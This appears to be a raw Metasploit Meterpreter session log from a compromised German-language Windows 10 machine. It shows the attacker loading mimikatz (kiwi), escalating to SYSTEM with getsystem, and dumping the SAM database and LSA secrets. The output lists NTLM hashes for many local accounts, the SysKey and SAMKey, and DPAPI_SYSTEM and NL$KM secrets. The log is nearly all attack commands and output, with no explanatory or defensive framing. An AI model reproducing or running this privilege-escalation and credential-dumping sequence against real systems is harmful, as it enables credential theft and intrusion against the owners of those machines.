meterpreter > sysinfo
Computer : PDB42001
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : de_DE
Domain : SPE
Logged On Users : 1
Meterpreter : x86/windows

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.1.1 20180925 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

[!] Loaded x86 Kiwi on an x64 architecture.

Success.

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid
Server username: NT-AUTORITÄT\SYSTEM

meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : WIN-10
SysKey : cb817619890661aaad841f4d8fea1fea
Local SID : S-1-5-21-3370639470-3712607899-531591615

SAMKey : e38ac807655642957b7bd58720730ce2

RID : 000001f4 (500)
User : Administrator

RID : 000001f5 (501)
User : Gast

RID : 000001f7 (503)
User : DefaultAccount

RID : 000003e9 (1001)
User : User1
  Hash NTLM: 92937945b518814341de3f726500d4ff

RID : 000003ea (1002)
User : user2
  Hash NTLM: 878d8014606cda29677a44efa1353fc7

RID : 000003eb (1003)
User : user3
  Hash NTLM: f5f22e80c142bbf35cef8a92bdc93578

RID : 000003ec (1004)
User : user4
  Hash NTLM: 2d20d252a479f485cdf5e171d93985bf

RID : 000003ed (1005)
User : user5
  Hash NTLM: 6757066fdab90200f97ed2412022bd95

RID : 000003ee (1006)
User : user6
  Hash NTLM: 439b7c9df428792c7b8962e981441f94

RID : 000003ef (1007)
User : user7
  Hash NTLM: b9561328b5c1c1c461db45e6f29c0116

RID : 000003f0 (1008)
User : user10
  Hash NTLM: 92e56a700458da8fef6fddb701cf2aa1

RID : 000003f1 (1009)
User : user11
  Hash NTLM: c2ae1fe6e648846352453e816f2aeb93

RID : 000003f2 (1010)
User : user12
  Hash NTLM: 58738afe30e5a9a9475512373122787f

RID : 000003f3 (1011)
User : user13
  Hash NTLM: 98c68d494c8f1f5e69e6de5d12773e42

RID : 000003f4 (1012)
User : user14
  Hash NTLM: 751721a3c9db8fcf51ea120135c337b3

RID : 000003f5 (1013)
User : user20
  Hash NTLM: d989ef70a522e2f10335d9c8817e7ce8

RID : 000003f6 (1014)
User : user21
  Hash NTLM: 7a21db80d0536faa274cb5af5f625920

RID : 000003f7 (1015)
User : user22
  Hash NTLM: cbae45a3c0fa281ea1c918a881273959

RID : 000003f8 (1016)
User : user23
  Hash NTLM: e7396c46b9203a09a495b7b4a4baa652

RID : 000003f9 (1017)
User : user24
  Hash NTLM: e029d1342517fa9d6da2cf006493a2e4

meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : WIN-10
SysKey : cb817619890661aaad841f4d8fea1fea

Local name : WIN-10 ( S-1-5-21-3370639470-3712607899-531591615 )
Domain name : WORKGROUP

Policy subsystem is : 1.13
LSA Key(s) : 1, default {f410e79f-99f5-23df-5f81-2899d7ce4e7a}
  [00] {f410e79f-99f5-23df-5f81-2899d7ce4e7a} b9f9156c3ef8ebc9ad483064aaeee482124d448fa9e947d62bb15c4aaccfa09b

Secret : DefaultPassword
old/text: Klartext-Admin-Passwort

Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 50 ca 98 f3 67 93 02 fa a5 4f 54 ed da e2 67 7c 7c ac 2f 15 e3 9b 64 9f f1 55 61 02 d8 b4 a2 36 b4 d6 56 ba 87 4b 11 a3
    full: 50ca98f3679302faa54f54eddae2677c7cac2f15e39b649ff1556102d8b4a236b4d656ba874b11a3
    m/u : 50ca98f3679302faa54f54eddae2677c7cac2f15 / e39b649ff1556102d8b4a236b4d656ba874b11a3
old/hex : 01 00 00 00 cd 7f 8d 5b bb 89 cf ff cd 89 d7 87 a9 5f 75 b6 1a d1 f1 6a 08 f1 b6 01 62 7e 33 ea a3 2c d2 d8 f2 f8 0d 17 d7 13 6f e9
    full: cd7f8d5bbb89cfffcd89d787a95f75b61ad1f16a08f1b601627e33eaa32cd2d8f2f80d17d7136fe9
    m/u : cd7f8d5bbb89cfffcd89d787a95f75b61ad1f16a / 08f1b601627e33eaa32cd2d8f2f80d17d7136fe9

Secret : NL$KM
cur/hex : c7 51 24 73 8e f9 b3 2a dd b7 2a 06 ea 00 2a 17 af a9 ce f4 f3 14 2c a0 a9 cc 8f a9 ad 7e 4f 4b 4d 9d f0 1b 12 bd f3 b4 05 04 d9 e4 6d f5 24 6d 80 fb a9 3e 7b 43 f5 4d e8 45 5b 36 30 3e 52 3e
old/hex : c7 51 24 73 8e f9 b3 2a dd b7 2a 06 ea 00 2a 17 af a9 ce f4 f3 14 2c a0 a9 cc 8f a9 ad 7e 4f 4b 4d 9d f0 1b 12 bd f3 b4 05 04 d9 e4 6d f5 24 6d 80 fb a9 3e 7b 43 f5 4d e8 45 5b 36 30 3e 52 3e

meterpreter >